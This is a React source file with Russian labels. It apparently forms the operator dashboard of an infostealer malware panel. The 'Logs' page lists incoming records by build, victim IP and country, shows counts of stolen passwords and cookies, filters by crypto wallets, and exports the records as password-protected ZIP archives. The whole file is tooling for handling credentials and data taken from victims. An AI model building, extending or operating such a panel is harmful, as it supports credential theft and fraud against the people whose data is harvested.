import React, { useEffect, useMemo, useRef, useState } from 'react';
import toast from 'react-hot-toast';
import api, { cacheGet, cacheSet, downloadApiBlob, listFrom, parseJsonList, stringParams } from '../api';

const FILTER_OPTS = [
  { key: 'country', label: 'Страна' },
  { key: 'build', label: 'Ter / Билд' },
  { key: 'wallets', label: 'Кошельки' },
  { key: 'ip', label: 'IP-адрес' },
  { key: 'downloaded', label: 'Скачанные' },
  { key: 'sent', label: 'Отправленные' },
  { key: 'from', label: 'Дата от' },
  { key: 'to', label: 'Дата до' },
];

function flagEmoji(code) {
  if (!code || code.length !== 2) return '🏳️';
  const c = code.toUpperCase();
  return String.fromCodePoint(...[...c].map((ch) => 127397 + ch.charCodeAt(0)));
}

function mergeTags(row) {
  const filters = parseJsonList(row.filters_hit);
  const apps = parseJsonList(row.apps);
  const combined = [...filters, ...apps];
  const seen = new Set();
  return combined.filter((x) => {
    if (seen.has(x)) return false;
    seen.add(x);
    return true;
  });
}

export default function Logs() {
  const cached = cacheGet('logs:page1', null);
  const [rows, setRows] = useState(() => (cached?.rows ? cached.rows : []));
  const [total, setTotal] = useState(() => Number(cached?.total) || 0);
  const [pending, setPending] = useState(() => Number(cached?.pending) || 0);
  const [q, setQ] = useState('');
  const [selected, setSelected] = useState([]);
  const [filters, setFilters] = useState({});
  const [menu, setMenu] = useState(false);
  const [rowMenu, setRowMenu] = useState(null);
  const [page, setPage] = useState(1);
  const [loading, setLoading] = useState(false);
  const rowMenuRef = useRef(null);
  const seqRef = useRef(0);

  async function load() {
    const seq = ++seqRef.current;
    const params = stringParams({ q, page, limit: 50, ...filters });
    setLoading(true);
    try {
      const { data } = await api.get('/logs', { params });
      if (seq !== seqRef.current) return;
      const next = listFrom(data, 'logs', 'rows');
      const tot = data.pagination?.total ?? data.total ?? next.length;
      const pend = Number(data.pending_export) || 0;
      setRows(next);
      setTotal(tot);
      setPending(pend);
      cacheSet(`logs:p${page}`, { rows: next, total: tot, pending: pend });
      if (page === 1 && !Object.keys(filters).length && !q) {
        cacheSet('logs:page1', { rows: next, total: tot, pending: pend });
      }
    } catch (err) {
      if (seq !== seqRef.current) return;
      /* keep previous rows — never wipe to empty on transient errors */
      toast.error('Не удалось загрузить логи');
      throw err;
    } finally {
      if (seq === seqRef.current) setLoading(false);
    }
  }

  useEffect(() => {
    load().catch(() => {});
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [page, filters]);

  useEffect(() => {
    function onDocClick(e) {
      if (rowMenuRef.current && !rowMenuRef.current.contains(e.target)) setRowMenu(null);
    }
    document.addEventListener('click', onDocClick);
    return () => document.removeEventListener('click', onDocClick);
  }, []);

  const allChecked = useMemo(() => rows.length > 0 && selected.length === rows.length, [rows, selected]);

  function toggleAll() {
    setSelected(allChecked ? [] : rows.map((r) => r.id));
  }

  function toggle(id) {
    setSelected((s) => (s.includes(id) ? s.filter((x) => x !== id) : [...s, id]));
  }

  async function delSelected() {
    if (!selected.length) return toast.error('Ничего не выбрано');
    if (!window.confirm(`Удалить ${selected.length} лог(ов)?`)) return;
    try {
      await api.delete('/logs', { data: { ids: selected } });
      setSelected([]);
      toast.success('Удалено');
      load();
    } catch {
      toast.error('Ошибка удаления');
    }
  }

  async function delOne(id) {
    if (!window.confirm('Удалить этот лог?')) return;
    try {
      await api.delete('/logs', { data: { ids: [id] } });
      setSelected((s) => s.filter((x) => x !== id));
      toast.success('Удалено');
      setRowMenu(null);
      load();
    } catch {
      toast.error('Ошибка удаления');
    }
  }

  async function delAll() {
    if (!window.confirm('Удалить ВСЕ логи?')) return;
    try {
      await api.delete('/logs', { data: { all: 1 } });
      setSelected([]);
      toast.success('Все логи удалены');
      load();
    } catch {
      toast.error('Ошибка удаления');
    }
  }

  function downloadAll() {
    if (!pending) {
      toast.error('Нет новых логов для выгрузки');
      return;
    }
    try {
      downloadApiBlob('/logs/export/all-zip', 'apex_logs_export.zip');
      toast.success(`Выгрузка ${pending} лог(ов) — архив с паролем из Настроек`);
      setTimeout(() => load().catch(() => {}), 2500);
    } catch (err) {
      toast.error(err?.message || 'Ошибка выгрузки');
    }
  }

  function downloadOne(id) {
    try {
      api.post(`/logs/${id}/viewed`).catch(() => {});
      downloadApiBlob(`/logs/${id}/export/zip`, `log_${id}.zip`);
      toast.success(`Лог #${id} — ZIP без пароля`);
      setRowMenu(null);
      setTimeout(() => load().catch(() => {}), 2000);
    } catch (err) {
      toast.error(err?.message || 'Ошибка скачивания');
    }
  }

  async function markViewed(id) {
    try {
      await api.post(`/logs/${id}/viewed`);
      toast.success('Отмечено просмотренным');
      setRowMenu(null);
      load();
    } catch {
      toast.error('Ошибка');
    }
  }

  const activeFilterChips = Object.entries(filters).filter(([, v]) => v !== '' && v != null);

  return (
    <div>
      <div className="rm-toolbar">
        {activeFilterChips.map(([k, v]) => (
          <span key={k} className="rm-tag">
            {k} IS {String(v)}
            <button type="button" onClick={() => setFilters((f) => ({ ...f, [k]: '' }))}>×</button>
          </span>
        ))}
        <input
          className="rm-search"
          placeholder="Поиск"
          value={q}
          onChange={(e) => setQ(e.target.value)}
          onKeyDown={(e) => e.key === 'Enter' && (setPage(1), load())}
        />
        <span className="rm-badge">{total} всего</span>
        <span className="rm-badge" title="Ещё не выгруженные в итоговый архив">
          {pending} к выгрузке
        </span>
        <div className="rm-actions">
          {selected.length ? (
            <>
              <button type="button" className="rm-btn danger" onClick={delSelected}>Удалить выбранные</button>
              <button type="button" className="rm-btn ghost" onClick={() => setSelected([])}>Снять выделение</button>
            </>
          ) : (
            <>
              <button type="button" className="rm-btn danger" onClick={delAll}>Удалить все</button>
              <button type="button" className="rm-btn primary" onClick={downloadAll} disabled={!pending}>
                Выгрузить новые{pending ? ` (${pending})` : ''}
              </button>
            </>
          )}
          <div style={{ position: 'relative' }}>
            <button type="button" className="rm-btn ghost" onClick={() => setMenu((m) => !m)}>Фильтры ▾</button>
            {menu && (
              <div className="rm-card" style={{ position: 'absolute', right: 0, top: 40, width: 240, zIndex: 5, padding: 8 }}>
                {FILTER_OPTS.map((o) => (
                  <button
                    key={o.key}
                    type="button"
                    className="rm-btn ghost"
                    style={{ width: '100%', justifyContent: 'flex-start', marginBottom: 4 }}
                    onClick={() => {
                      const val = window.prompt(o.label);
                      if (val != null && val !== '') setFilters((f) => ({ ...f, [o.key]: String(val) }));
                      setMenu(false);
                      setPage(1);
                    }}
                  >
                    {o.label}
                  </button>
                ))}
              </div>
            )}
          </div>
        </div>
      </div>

      <div className={`rm-card rm-table-wrap${loading ? ' rm-loading' : ''}`}>
        <table className="rm-table">
          <thead>
            <tr>
              <th><input type="checkbox" checked={!!allChecked} onChange={toggleAll} /></th>
              <th>Дата</th>
              <th>Билд</th>
              <th>IP</th>
              <th>Страна</th>
              <th>Пароли</th>
              <th>Куки</th>
              <th>Фильтры / Apps</th>
              <th>Пр.</th>
              <th />
            </tr>
          </thead>
          <tbody>
            {rows.map((r) => {
              const tags = mergeTags(r);
              return (
                <tr key={r.id}>
                  <td><input type="checkbox" checked={selected.includes(r.id)} onChange={() => toggle(r.id)} /></td>
                  <td>{(r.received_at || '').replace('T', ' ').slice(0, 16)}</td>
                  <td>{r.build_name || '—'}</td>
                  <td>{r.ip || '—'}</td>
                  <td>
                    <span className="rm-flag">
                      <span>{flagEmoji(r.country_code)}</span>
                      {(r.country_code || r.country || '??').toString().slice(0, 2).toUpperCase()}
                    </span>
                  </td>
                  <td>{r.passwords ?? 0}</td>
                  <td>{r.cookies ?? 0}</td>
                  <td>
                    <div className="rm-tags">
                      {tags.length ? tags.slice(0, 4).map((x) => (
                        <span key={`${r.id}-${x}`} className="rm-tag">{x}</span>
                      )) : <span className="rm-no">НЕТ</span>}
                    </div>
                  </td>
                  <td>{r.viewed ? <span className="rm-yes">ДА</span> : <span className="rm-no">НЕТ</span>}</td>
                  <td style={{ position: 'relative' }}>
                    <button
                      type="button"
                      className="rm-dots"
                      onClick={(e) => {
                        e.stopPropagation();
                        setRowMenu(rowMenu === r.id ? null : r.id);
                      }}
                    >
                      ⋯
                    </button>
                    {rowMenu === r.id && (
                      <div
                        ref={rowMenuRef}
                        className="rm-card"
                        style={{ position: 'absolute', right: 0, top: 36, minWidth: 180, zIndex: 10, padding: 6 }}
                        onClick={(e) => e.stopPropagation()}
                      >
                        <button type="button" className="rm-btn ghost" style={{ width: '100%', justifyContent: 'flex-start' }} onClick={() => downloadOne(r.id)}>
                          Скачать ZIP (без пароля)
                        </button>
                        <button type="button" className="rm-btn ghost" style={{ width: '100%', justifyContent: 'flex-start' }} onClick={() => markViewed(r.id)}>
                          Отметить просмотренным
                        </button>
                        <button type="button" className="rm-btn danger" style={{ width: '100%', justifyContent: 'flex-start' }} onClick={() => delOne(r.id)}>
                          Удалить
                        </button>
                      </div>
                    )}
                  </td>
                </tr>
              );
            })}
            {!rows.length && (
              <tr><td colSpan={10} className="rm-empty">Логов нет</td></tr>
            )}
          </tbody>
        </table>
      </div>

      <div className="rm-toolbar" style={{ marginTop: 12 }}>
        <button type="button" className="rm-btn ghost" disabled={page <= 1} onClick={() => setPage((p) => p - 1)}>←</button>
        <span className="rm-badge">стр. {page}</span>
        <button type="button" className="rm-btn ghost" onClick={() => setPage((p) => p + 1)}>→</button>
      </div>
    </div>
  );
}
